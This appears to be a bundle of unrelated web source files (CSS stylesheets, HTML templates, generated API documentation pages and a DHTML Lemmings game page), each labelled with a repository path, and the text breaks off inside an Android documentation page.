padding-bottom: 30px; text-align: center;} @media only screen and (max-width: 991px) { .thankyou_page .styles-block, .page-id-926 .styles-block{ max-width: 750px; } } @media only screen and (max-width: 767px) { } /* -------------------------------------------- TERMS & CONDITIONS -------------------------------------------- */ .terms_and_conditions_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .terms_and_conditions_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; max-width: 970px; min-height: 600px; } .terms_and_conditions_page .styles-block h1{ margin-top: 50px !important; margin-bottom: 50px !important; } .terms_and_conditions_page h2{ margin-top: 50px !important; } .terms_and_conditions_page h3{font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; font-size: 18px !important; text-align: left; letter-spacing: 0 !important; } .terms_and_conditions_page p{ letter-spacing: 0; } .terms_and_conditions_page ul{ margin-left: 30px; color: #000; } .terms_and_conditions_page li{ color: #000; margin-bottom: 10px; } @media only screen and (max-width: 991px) { .terms_and_conditions_page .styles-block{ max-width: 750px; } } @media only screen and (max-width: 767px) { } /* -------------------------------------------- FAQS -------------------------------------------- */ .faq_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .faq_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; max-width: 970px; min-height: 600px; } .faq_page .styles-block h1{ margin-top: 50px !important; margin-bottom: 50px !important; } .faq_page h2{ margin-top: 50px !important; } .faq_page h3{font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; font-size: 18px !important; text-align: left; letter-spacing: 0 !important; } .faq_page p{ letter-spacing: 0; } .faq_page ul{ margin-left: 30px; color: #000; } .faq_page li{ color: #000; margin-bottom: 10px; } @media only screen and (max-width: 991px) { .faq_page .styles-block{ max-width: 750px; } } @media only screen and (max-width: 767px) { } /* -------------------------------------------- CONTACT US -------------------------------------------- */ .contact_us_page .wpcf7-response-output{display: block; color: #FFFFFF; background-color: #0e2334; font-size: 14px; font-weight: 700; text-align: center; padding: 20px; border: none !important;} .contact_us_page .wpcf7-display-none{display: none;} .contact_us_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .contact_us_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; max-width: 970px; min-height: 600px; } .contact_us_page .styles-block h1{ margin-top: 50px !important; } .contact_us_page h2{ margin-top: 50px !important; } .contact_us_page h3{font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; font-size: 18px !important; } .contact_us_page .georgia_text{ font-size: 18px !important; padding-top: 40px; padding-bottom: 50px; text-align: center; } .contact_us_page .area1 a{ font-weight: bold; color: #000 !important; } .contact_us_page .area1 a:hover{ color:#b08536 !important;} .contact_us_page .area1 .sf-icon.sf-icon-medium { font-size:34px !important; width: auto; height: auto; color:#000; } .contact_us_page .area1 .sf-icon.sf-icon-medium:hover { color:#fff; } .contact_us_page .area1 .sf-icon-cont{ border-color:#999 !important;} @media only screen and (max-width: 991px) { .contact_us_page .styles-block{ max-width: 750px; } } @media only screen and (max-width: 767px) { } /* -------------------------------------------- TESTIMONIALS -------------------------------------------- */ .testimonials_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .testimonials_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; max-width: 970px; min-height: 600px; } .testimonials_page .styles-block h1{ margin-top: 50px !important; } .testimonials_page h2{ margin-top: 50px !important; } .testimonials_page h3{font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; font-size: 18px !important; } .testimonials_page .georgia_text{ line-height: 26px; font-size: 16px !important; padding-top: 100px; padding-bottom: 0px; text-align: center; } .testimonials_page .author_name{ font-family:proxregular, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; padding-bottom: 30px; } .testimonials_page .area2{ border-top:1px solid #e3e3e3; border-bottom:1px solid #e3e3e3; background: rgba(153, 153, 153, 0.05); } .testimonials_page .area2 .container{ width: auto; max-width: 600px; margin:auto; } .testimonials_page .area3 .container{ width: auto; max-width: 600px; margin:auto; } .testimonials_page .area4{ border-top:1px solid #e3e3e3; border-bottom:1px solid #e3e3e3; background: rgba(153, 153, 153, 0.05); } .testimonials_page .area4 .container{ width: auto; max-width: 600px; margin:auto; } .testimonials_page .area5 .container{ width: auto; max-width: 600px; margin:auto; } .testimonials_page .area6{ border-top:1px solid #e3e3e3; background: rgba(153, 153, 153, 0.05); } .testimonials_page .area6 .container{ width: auto; max-width: 600px; margin:auto; } .testimonials_page .spb-row-container { margin:0 !important; padding:0 !important;} @media only screen and (max-width: 991px) { .testimonials_page .styles-block{ max-width: 750px; } } @media only screen and (max-width: 767px) { } /* -------------------------------------------- GIFT CARD -------------------------------------------- */ .gift_card_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .gift_card_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; } .gift_card_page h2{ margin-top: 50px !important; } .gift_card_page h3{font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; font-size: 18px !important; } .gift_card_page .gift_card_wrapper{ float: left !important; padding-top: 80px; margin: auto; position: relative; border-top: 1px solid #e3e3e3; margin-bottom:50px; padding-bottom: 0px; float: none !important; position: relative; } .gift_card_page .gift_card_wrapper h2{ margin-top: 0px !important; margin-bottom: 30px; } .gift_card_page .georgia_text{ font-size: 18px !important; padding-top: 50px; padding-bottom: 30px; text-align: center; } .gift_card_page .gift_card_info { border:1px solid #e3e3e3; cursor: pointer;} .gift_card_page .gift_card_info:hover>.gift_icon { background-position: 0 -96px !important;} .gift_card_page .gift_card_info:hover>h3 { color: #b08536 !important; } .gift_card_page .gift_card_info.selected>.gift_icon { background-position: 0 -96px !important; } .gift_card_page .gift_card_info.selected>h3 { color: #b08536 !important; } .gift_card_page .gift_card_info h3{ margin-bottom: 30px;} .gift_card_page .gift_card_info .gift_icon{ margin: 0 auto; margin-top:50px; height:96px; width:118px; } .gift_card_page .gift_card_info.e-card .gift_icon{ background: url(images/icon_e-card.png) no-repeat; } .gift_card_page .gift_card_info.physical .gift_icon{ background: url(images/icon_physical.png) no-repeat; } .gift_card_page .gift_card_info.buy_a_box .gift_icon{ background: url(images/icon_buy_a_box.png) no-repeat; } .gift_card_page .gift_card_info.physical { border:1px solid #e3e3e3 !important; border-right: none !important; border-left: none !important; } @media only screen and (max-width: 767px) { .gift_card_page .gift_card_info{ margin-bottom: 0 !important; width: 100%; float: left; } .gift_card_page .gift_card_info.physical { border:1px solid #e3e3e3 !important; border-bottom: none !important; border-top: none !important; } } @media only screen and (min-width: 1200px) { .row .alt-bg{ margin-left: -270px !important; padding-right: 270px !important; padding-left: 270px !important; } } @media only screen and (min-width: 1500px) { .row .alt-bg{ margin-left: -550px !important; padding-right: 550px !important; padding-left: 550px !important; } } @media only screen and (max-width: 767px) { .title-forms{ padding:0; } .post-1194 p, .post-1194 b, .post-1194 td { font-size: 10px !important; margin: 0; } .post-1194 b { font-size: 9px !important; } .page-id-1194 .page-heading h1 { font-size: 20px !important; } .page-id-1194 .page-heading { padding: 10px 20px !important; margin: 0 !important; } .page-id-1194 .container { padding: 0 2px; } .page-id-1194 table td { padding: 6px 0; } } @media only screen and (min-width: 1200px) { .container {width: 980px; } } @media only screen and (max-width: 991px) { #logo { width: 90% !important; margin: 0 5%; } #copyright nav .menu { margin-top: 0 !important; } .details-menu li span{ width:100%; border-right:none; } #logo { padding: 0 15px; left: 0; height: auto; position: relative; width: 90% !important; max-width: none !important; } } .in-media { background: #333b47 url(images/media_bg.jpg) center center repeat; min-height: 245px; clear: both; } .in-media img { vertical-align: middle; } img.in-m-e { padding-left: 60px; padding-right: 70px; } div.in-m-wrap { line-height: 240px; } .in-media a { margin-right: 90px; } .slider_wrapper .hidden-md.hidden-lg { padding-bottom: 10px; text-align: center; color: #525252; } @media only screen and (max-width: 479px) { .profile_details_page #main-container, .profile_style_page #main-container, .profile_preferences_page #main-container, .profile_sizing_page #main-container, .profile_pricing_page #main-container, .profile_delivery_page #main-container { background-size: 350%; } .profile_details_page div.full-width-text.spb_content_element.col-sm-12.spb_text_column.no-padding-top, .profile_style_page div.full-width-text.spb_content_element.col-sm-12.spb_text_column.no-padding-top, .profile_preferences_page div.full-width-text.spb_content_element.col-sm-12.spb_text_column.no-padding-top, .profile_sizing_page div.full-width-text.spb_content_element.col-sm-12.spb_text_column.no-padding-top, .profile_pricing_page div.full-width-text.spb_content_element.col-sm-12.spb_text_column.no-padding-top, .profile_delivery_page div.full-width-text.spb_content_element.col-sm-12.spb_text_column.no-padding-top { padding-bottom: 0; margin-bottom: 0; } .title-forms p { top: 35px; margin-bottom: 55px; padding: 0 15px; } .numbering { top:5px; position: absolute; width: 100%; text-align: center; } .key-info { max-width: 445px !important; margin: 8px auto 0px auto !important; width: 95% !important; } #logo { background-image: url(images/logo-black_x2.png); } .home_page #logo { background-image: url(images/logo-header_x2.png); } .home_page .area2 .spb_content_wrapper h1 { font-size: 27px !important; line-height: 27px !important; } .sf-icon-cont.cont-medium { margin: 10px 2px 10px 2px !important; padding: 2px !important; width: 38px; height: 38px; } .spb_box_text .box-content-wrap { padding: 20px 0; } .sf-icon-cont.cont-medium .sf-icon { line-height: 40px; } .fa-facebook.sf-icon.sf-icon-medium { font-size:25px !important; } .fa-rss.sf-icon.sf-icon-medium { font-size:25px !important; } .fa-twitter.sf-icon.sf-icon-medium { font-size:25px !important; } .fa-instagram.sf-icon.sf-icon-medium { font-size:25px !important; } .fa-tumblr.sf-icon.sf-icon-medium { font-size:25px !important; } div.spb_content_element.col-sm-12.social_buttons.spb_box_text.whitestroke { padding-bottom: 0; margin-bottom: 0; } div.spb_content_element.col-sm-12.social_buttons.spb_box_text.whitestroke h2 { margin-top: 10px; } .home_page .fullscreen-container { height: 350px !important; } .tp-simpleresponsive .tp-caption p span { width: 85%; margin: 0 auto; display: block; } .footer-menu.std-menu .menu li > a { margin: 0 8px; } .testimonials_page .styles-block h1 { font-size: 30px !important; margin: 0px !important; } .spb_text_column { margin-bottom: 0 !important; } .testimonials_page .georgia_text { padding-top: 50px; margin: 0 !important; } .testimonials_page .author_name { padding-bottom: 0; margin-bottom: 0; } .testimonials_page .area2, .testimonials_page .area3, .testimonials_page .area4, .testimonials_page .area5, .testimonials_page .area6 { margin-bottom: 0; padding-bottom: 40px; } .fw-video-link-image i { top:160%; } .spb_parallax_asset { padding-top: 30px; padding-bottom: 30px; } .about_us_page h1 { line-height: 28px !important; font-size: 20px !important; } .about_us_page .full-width-text { padding-top: 10px; padding-bottom: 10px; } img.in-m-e{ padding: 40px 10px; } div.in-m-wrap { line-height: normal; } .in-media img { display: block; margin: 0 auto; } .in-media a { display: block; margin: 0; padding-bottom: 30px; } .slider_wrapper .notch_label { font-size: 10px; } .slider { padding-left: 30px; padding-right: 30px; } input[type="text"].slider_selection { margin-bottom: 0; font-size: 30px !important; } .profile_sizing_page .box_options_wrapper { padding-bottom: 10px; padding-top: 20px; margin: 0; } .slider_wrapper { padding-top: 5px; } .slider_wrapper div.col-sm-2 { margin-bottom: 5px; } .mini-wrapper-forms { padding-bottom: 0; } .slider_wrapper div.col-sm-2 { font-size: 22px !important; } .featured_blog_box_left { float: none; } .featured_blog_boxes_wrapper.featured2 { float: none; } .social_boxes_wrapper { float: none; } .social_box_left { background-size: contain !important; background-color: #FFF !important; } .mini-wrapper5 { margin: 0px auto; } .customer-info3 { margin: 8px auto 20px auto; } .login_page .georgia_text { margin: 40px 0 20px 0 !important; height: auto; } } #logo { background-image: url(images/logo-black_x2.png); max-height: 52px !important; <!--[if IE]> background-image: url(images/logo-black_x2.png); background-size: 230px; <![endif]--> } .home_page #logo { background-image: url(images/logo-header_x2.png); } @media only screen and (max-width: 991px) { .details-menu li span { display: block; float: none; font-size: 10px; color: #777; height: auto; line-height: 30px; } .details-menu ul { float: none; max-height: none; } .details-menu { height: auto; } .details-menu li span.active { font-size: 15px; color: #000; line-height: 50px; padding-bottom: 1px; } } .about_us_page .spb_parallax_asset { background-attachment: inherit !important; }
wp-content/plugins/contus-video-gallery.3.0/contus-video-gallery/admin/css/jquery.ui.all.css
iAPT/producerroom
/* Name: Wordpress Video Gallery Plugin URI: http://www.apptha.com/category/extension/Wordpress/Video-Gallery Description: jquery ui css file. Version: 2.8 Author: Apptha Author URI: http://www.apptha.com License: GPL2 */ /* * jQuery UI CSS Framework 1.8.9 * * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://docs.jquery.com/UI/Theming */ @import "jquery.ui.base.css"; @import "jquery.ui.theme.css";
app/org/iatoki/judgels/uriel/contest/clarification/editClarificationAnswerView.scala.html
judgels/uriel
@import org.iatoki.judgels.uriel.contest.clarification.ContestClarificationEditForm @import play.i18n.Messages @import org.iatoki.judgels.play.views.html.formErrorView @import org.iatoki.judgels.uriel.contest.clarification.ContestClarification @import org.iatoki.judgels.uriel.contest.html.supervisorjs @import org.iatoki.judgels.uriel.contest.clarification.routes @import org.iatoki.judgels.play.JudgelsPlayUtils @(contestId: Long, clarification: ContestClarification, contestClarificationEditForm: Form[ContestClarificationEditForm]) @implicitFieldConstructor = @{ b3.horizontal.fieldConstructor("col-md-3", "col-md-9") } @formErrorView(contestClarificationEditForm) @b3.form(routes.ContestClarificationController.postEditClarificationAnswer(contestId, clarification.getId)) { @helper.CSRF.formField @b3.static(Messages.get("clarification.title")) { @clarification.getTitle } @b3.static(Messages.get("clarification.topic")) { @clarification.getTopic } <div class="form-group"> <label class="control-label col-md-3">@Messages.get("clarification.question")</label> <div class="col-md-9"> @Html(JudgelsPlayUtils.escapeHtmlString(clarification.getQuestion)) </div> </div> @b3.textarea(contestClarificationEditForm("answer"), '_label -> Messages.get("clarification.answer"), 'class -> "form-control") @b3.select(contestClarificationEditForm("status"), Seq("ANSWERED" -> "Answered"), '_label -> Messages.get("clarification.status"), 'class -> "selectpicker") @b3.submit('class -> "btn btn-primary") { @Messages.get("commons.update") } } @supervisorjs(contestId)
html/gameselect.html
radare/fxos-app-lemmings
<!-- DHTML Lemmings(TM) - GNU Copyright (c) 2004 by crisp / freesoftware[at]xs4all.nl --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="viewport" content="width=device-width,user-scalable=no"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="imagetoolbar" content="no"> <title>Lemmings! - Choose game</title> <link rel="stylesheet" href="../style/style.css" type="text/css"> <script type="text/javascript" src="../js/standards.js"></script> <script type="text/javascript" src="../js/cookies.js"></script> <script type="text/javascript"> var rating = getURLParameter(window.location.search, 'rating'); include('../levels/'+rating+'.js'); var selected_level = 0; function init() { document.getElementById('code').value = selected_level? levels[selected_level][1]:''; document.getElementById('code').onselectstart = allowSelect; document.getElementById('choice').scrollTop = (selected_level - 1) * 16; } function selectlevel(i) { if (selected_level) { document.getElementById('lvl'+selected_level).style.backgroundColor = '#000000'; } selected_level = i; document.getElementById('lvl'+selected_level).style.backgroundColor = '#00ff00'; document.getElementById('code').value = levels[i][1]; if (levels[i][1] == '') document.getElementById('code').focus(); } function play() { if (!selected_level) { alert('please select a level'); return; } var code = document.getElementById('code').value.toUpperCase(); if (code == '') { alert('please enter the code for level '+selected_level); document.getElementById('code').focus(); return; } document.write ("<div style='top:0px;left:0px;background-color:black;width:100%;height:100%;color:white;position:absolute'><br /><br /><center>Loading...</center></div>"); window.location.replace('lemmings.html?level='+selected_level+'&rating='+rating+'&code='+code); return false; } function allowSelect(e) { if (typeof e == 'undefined') e = event; cancelPropagation(e); return true; } function scaleStuff () { function viewPort() { var h = window.innerHeight || document.documentElement.clientHeight || document.getElementsByTagName('body')[0].clientHeight; var w = window.innerWidth || document.documentElement.clientWidth || document.getElementsByTagName('body')[0].clientWidth; return {width : w, height : h}; } var size = viewPort(); var b = document.getElementById ("content"); b.style.top = "10px"; b.style.height = ""+(size.height - 60) + "px"; var b = document.getElementById ("choice"); b.style.height = ((size.height-80) / 2) + "px"; } window.onresize = scaleStuff; document.addEventListener ('DOMContentLoaded', function (e) { scaleStuff (); }); </script> </head> <body id="body" onload="init_music()"> <div id="content"><h1>Choose Game - rating: <script type="text/javascript">document.write(rating);</script></h1> <center> <div id="choice"> <script type="text/javascript"> // get client cookie var cookie = localStorage.getItem (rating.toUpperCase()) || ""; var completed = getURLParameter(cookie, 'completed').split(','); var nextlevel = parseInt(getURLParameter(cookie, 'nextlevel'), 10); var nextlevelcode = getURLParameter(cookie, 'nextlevelcode'); var i; for (i = 0; i < completed.length; i++) { var codesplit = completed[i].split(':'); var level = parseInt(codesplit[0], 10); if (typeof levels[level] != 'undefined') { levels[level][1] = codesplit[1]; if (typeof codesplit[2] != 'undefined') levels[level][2] = 1; } } if (!isNaN(nextlevel) && typeof levels[nextlevel] != 'undefined' && levels[nextlevel][2] == 0) { levels[nextlevel][1] = nextlevelcode; selected_level = nextlevel; } else if (typeof levels[1] != 'undefined' && levels[1][2] == 0) selected_level = 1; // write options for (i = 1; i < levels.length; i++) { document.write('<div id="lvl'+i+'" onmouseover="if(this.className!=\'selected\')this.style.backgroundColor=\'#0000ff\'" onmouseout="this.style.backgroundColor=\'\'" onclick="selectlevel('+i+')" ondblclick="play()"'); if (i == selected_level) document.write(' class="selected"'); document.write('>'+i+'. '+levels[i][0]); if (levels[i][1] && levels[i][2]) document.write(' <img src="../img/vinkje.gif" width="9" height="9" alt="" />'); document.write('<\/div>'); } </script> </div> <div class="center" style="margin-top: 10px"> <center> <table> <tr><td> <h2><a href="menu.html" target="_self" onfocus="this.blur()">Menu</a></h2> </td><td> <form style="display:inline" action="#" onsubmit="return play()"><input style="text-align:center" type="text" id="code" value="" /></form> </td><td> <h2><a href="javascript://" target="_self" onclick="return play()" onfocus="this.blur()">Play!</a></h2> </td></tr> </table> </center> </div> </center> <img id="lemmingLeft" src="../img/lemming_left.gif" alt="" /> <img id="lemmingRight" src="../img/lemming_right.gif" alt="" /> <!-- <div id="version"><script type="text/javascript">document.write(version+' '+formatdate(rts));</script></div> <div id="copyright"><a href="gpl.html" target="_self" onfocus="this.blur()">GNU copyright</a> &copy; 2004 by crisp - <a href="mailto:freesoftware&#x40;xs4all.nl" target="_blank" onfocus="this.blur()">freesoftware[at]xs4all.nl</a></div> --> </div> </body> </html>
os1/doc/os1/io/ide/constant.PORTS.html
mark-i-m/mark-i-m.github.io
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="generator" content="rustdoc"> <meta name="description" content="API documentation for the Rust `PORTS` constant in crate `os1`."> <meta name="keywords" content="rust, rustlang, rust-lang, PORTS"> <title>os1::io::ide::PORTS - Rust</title> <link rel="stylesheet" type="text/css" href="../../../main.css"> </head> <body class="rustdoc"> <!--[if lte IE 8]> <div class="warning"> This old browser is unsupported and will most likely display funky things. </div> <![endif]--> <nav class="sidebar"> <p class='location'><a href='../../index.html'>os1</a>::<wbr><a href='../index.html'>io</a>::<wbr><a href='index.html'>ide</a></p><script>window.sidebarCurrent = {name: 'PORTS', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script> </nav> <nav class="sub"> <form class="search-form js-only"> <div class="search-container"> <input class="search-input" name="search" autocomplete="off" placeholder="Click or press ‘S’ to search, ‘?’ for more options…" type="search"> </div> </form> </nav> <section id='main' class="content constant"> <h1 class='fqn'><span class='in-band'><a href='../../index.html'>os1</a>::<wbr><a href='../index.html'>io</a>::<wbr><a href='index.html'>ide</a>::<wbr><a class='constant' href=''>PORTS</a></span><span class='out-of-band'><span id='render-detail'> <a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs"> [<span class='inner'>&#x2212;</span>] </a> </span><a id='src-1464' class='srclink' href='../../../src/os1/io/ide.rs.html#15' title='goto source code'>[src]</a></span></h1> <pre class='rust const'>const PORTS: [u16; 2]<code> = </code><code>[0x1f0, 0x170]</code></pre><div class='docblock'><p>The base I/O port for each controller</p> </div></section> <section id='search' class="content hidden"></section> <section class="footer"></section> <aside id="help" class="hidden"> <div> <h1 class="hidden">Help</h1> <div class="shortcuts"> <h2>Keyboard Shortcuts</h2> <dl> <dt>?</dt> <dd>Show this help dialog</dd> <dt>S</dt> <dd>Focus the search field</dd> <dt>&larrb;</dt> <dd>Move up in search results</dd> <dt>&rarrb;</dt> <dd>Move down in search results</dd> <dt>&#9166;</dt> <dd>Go to active search result</dd> </dl> </div> <div class="infos"> <h2>Search Tricks</h2> <p> Prefix searches with a type followed by a colon (e.g. <code>fn:</code>) to restrict the search to a given type. </p> <p> Accepted types are: <code>fn</code>, <code>mod</code>, <code>struct</code>, <code>enum</code>, <code>trait</code>, <code>type</code>, <code>macro</code>, and <code>const</code>. </p> <p> Search functions by type signature (e.g. <code>vec -> usize</code>) </p> </div> </div> </aside> <script> window.rootPath = "../../../"; window.currentCrate = "os1"; window.playgroundUrl = ""; </script> <script src="../../../jquery.js"></script> <script src="../../../main.js"></script> <script async src="../../../search-index.js"></script> </body> </html>
test/test.html
david90/opengraphbox
<html> <head> <script type="text/javascript" src="//code.jquery.com/jquery-2.1.1.min.js"> </script> <script type="text/javascript" src="opengraphbox.js"> </script> </head> <body> <form> <input type="url" name="share-url" class="share-url"> </form> <script> $("input.share-url").change(function() { OGBox.crawlForURL(this.value); }); </script> </body> </html>
sites/all/modules/contrib/queue_runner/css/queue-runner.css
himmat1981/himmatrepo
/** * Styles for the Queue Runner module. */ /** * Views-related styles. */ .views-field-task-operations .ctools-no-js ul, .views-field-collector-operations .ctools-no-js ul { margin: 0; } .views-field-task-operations .ctools-no-js a, .views-field-collector-operations .ctools-no-js a { padding: 0; } .views-field-task-operations, .views-field-collector-operations { position: relative; } .views-field-task-operations .ctools-dropbutton, .views-field-collector-operations .ctools-dropbutton { position: absolute; top: 50%; margin-top: -12px; } /** * Styles for the file log dashboard. */ .queue-runner-file-log-toolbar form { float: left; margin-right: 2em; } .queue-runner-file-log-toolbar .form-item-type { float: none; } .queue-runner-file-log-toolbar .form-item { margin-right: .75em; } .queue-runner-file-log-previous-link, .queue-runner-file-log-next-link { margin: 0 .5em; }
lib/boost/boost_1_38_0/doc/html/boost_asio/reference/ip__resolver_service/query_type.html
scs/uclinux
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>ip::resolver_service::query_type</title> <link rel="stylesheet" href="../../../boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.73.2"> <link rel="start" href="../../../boost_asio.html" title="Boost.Asio"> <link rel="up" href="../ip__resolver_service.html" title="ip::resolver_service"> <link rel="prev" href="protocol_type.html" title="ip::resolver_service::protocol_type"> <link rel="next" href="resolve.html" title="ip::resolver_service::resolve"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../boost.png"></td> <td align="center"><a href="../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="protocol_type.html"><img src="../../../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../ip__resolver_service.html"><img src="../../../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="resolve.html"><img src="../../../../../doc/html/images/next.png" alt="Next"></a> </div> <div class="section" lang="en"> <div class="titlepage"><div><div><h4 class="title"> <a name="boost_asio.reference.ip__resolver_service.query_type"></a><a class="link" href="query_type.html" title="ip::resolver_service::query_type"> ip::resolver_service::query_type</a> </h4></div></div></div> <p> <a class="indexterm" name="id3170662"></a> The query type. </p> <pre class="programlisting"><span class="keyword">typedef</span> <span class="identifier">InternetProtocol</span><span class="special">::</span><span class="identifier">resolver_query</span> <span class="identifier">query_type</span><span class="special">;</span> </pre> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright © 2003 - 2008 Christopher M. Kohlhoff<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="protocol_type.html"><img src="../../../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../ip__resolver_service.html"><img src="../../../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../../../boost_asio.html"><img src="../../../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="resolve.html"><img src="../../../../../doc/html/images/next.png" alt="Next"></a> </div> </body> </html>
index.html
KodingSykosis/jQuery-DockingViewport
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>jQuery-DockingViewPort</title> <link type="text/css" rel="stylesheet" href="//cdn.kodingsykosis.com/jQueryUI/1.10.2/themes/base/jquery.ui.all.css" /> <link type="text/css" rel="stylesheet" href="//cdn.kodingsykosis.com/css/jQuery.ui.ViewPort.css"></link> <!--<link type="text/css" rel="stylesheet" href="//cdn.kodingsykosis.com/css/jQuery.ui.panel.css"></link>--> <link type="text/css" rel="stylesheet" href="css/jQuery.ui.panel.css"></link> <link type="text/css" rel="stylesheet" href="css/jQuery.ui.PanelGroup.css"></link> <link type="text/css" rel="stylesheet" href="css/jqtree.css"></link> <link type="text/css" rel="stylesheet" href="css/Example.css"></link> <script type="text/javascript" src="//cdn.kodingsykosis.com/jQuery/1.9.1/jQuery.js"> </script> <script type="text/javascript" src="//cdn.kodingsykosis.com/jQueryUI/1.10.2/jquery-ui.js"> </script> <script type="text/javascript" src="//cdn.kodingsykosis.com/scripts/jQuery.ui.ViewPort.js"> </script> <!--<script type="text/javascript" src="//cdn.kodingsykosis.com/scripts/jQuery.ui.panel.js"> </script>--> <script type="text/javascript" src="Scripts/jQuery.ui.panel.js"> </script> <script type="text/javascript" src="Scripts/jQuery.ui.PanelGroup.js"> </script> <script type="text/javascript" src="Scripts/jQuery.ui.DockingViewPort.js"> </script> <script type="text/javascript" src="Scripts/tree.jquery.js"> </script> <script type="text/javascript" src="Scripts/Example.js"> </script> </head> <body> <div id="west"> <div id="solutionTree" title="Project"></div> <div id="classTree" title="Class"></div> </div> <div id="south"></div> <div id="east"></div> <div id="north"></div> <div id="center"></div> </body> </html>
Coding/W3School/W3CN/www.w3school.com.cn/tiy/loadtext7e82.html
platinhom/ManualHom
<!DOCTYPE html> <html> <!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=jquerymobile_themes_content by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:52:26 GMT --> <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack --> <head> <link rel="stylesheet" href="../../code.jquery.com/mobile/1.3.2/jquery.mobile-1.3.2.min.css"> <script src="../../code.jquery.com/jquery-1.8.3.min.js"></script> <script src="../../code.jquery.com/mobile/1.3.2/jquery.mobile-1.3.2.min.js"></script> </head> <body> <div data-role="page" id="pageone"> <div data-role="header" data-theme="b"> <h1>此处是页面标题</h1> </div> <div data-role="content" data-theme="a"> <p>此处是内容。</p> <a href="#" data-role="button">按钮</a> <p>此处是 <a href="#">链接</a>!</p> </div> <div data-role="footer" data-theme="e"> <h1>此处是页脚文本</h1> </div> </div> </body> <!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=jquerymobile_themes_content by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:52:26 GMT --> </html>
pyas2/templates/pyas2/sendmessage.html
abhishek-ram/pyas2
{% extends "admin/base.html" %} {% load i18n %} {% load static %} {% block title %} Send Message {% endblock %} {% block content %} <h1>Select File to Send</h1> <p>&nbsp;Make your required selections below:</p> <br/> <form action="{{ form.action }}" method="post" enctype="multipart/form-data" >{% csrf_token %} <table> {{ form.as_table }} </table> <br/>&nbsp; <p></p> <input type="submit" name="fromselect" value="{% trans 'Send File' %}" /> </form> {% endblock %}
BeerDrop-android/libs/google_play_services/docs/reference/com/google/android/gms/gcm/package-summary.html
DarkoDanchev/BeerDrop-Game-
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width" /> <link rel="shortcut icon" type="image/x-icon" href="../../../../../../favicon.ico" /> <title>com.google.android.gms.gcm | Android Developers</title> <!-- STYLESHEETS --> <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Roboto+Condensed"> <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Roboto:light,regular,medium,thin,italic,mediumitalic,bold" title="roboto"> <link href="../../../../../../assets/css/default.css?v=2" rel="stylesheet" type="text/css"> <!-- FULLSCREEN STYLESHEET --> <link href="../../../../../../assets/css/fullscreen.css" rel="stylesheet" class="fullscreen" type="text/css"> <!-- JAVASCRIPT --> <script src="http://www.google.com/jsapi" type="text/javascript"></script> <script src="../../../../../../assets/js/android_3p-bundle.js" type="text/javascript"></script> <script type="text/javascript"> var toRoot = "../../../../../../"; var metaTags = []; var devsite = false; 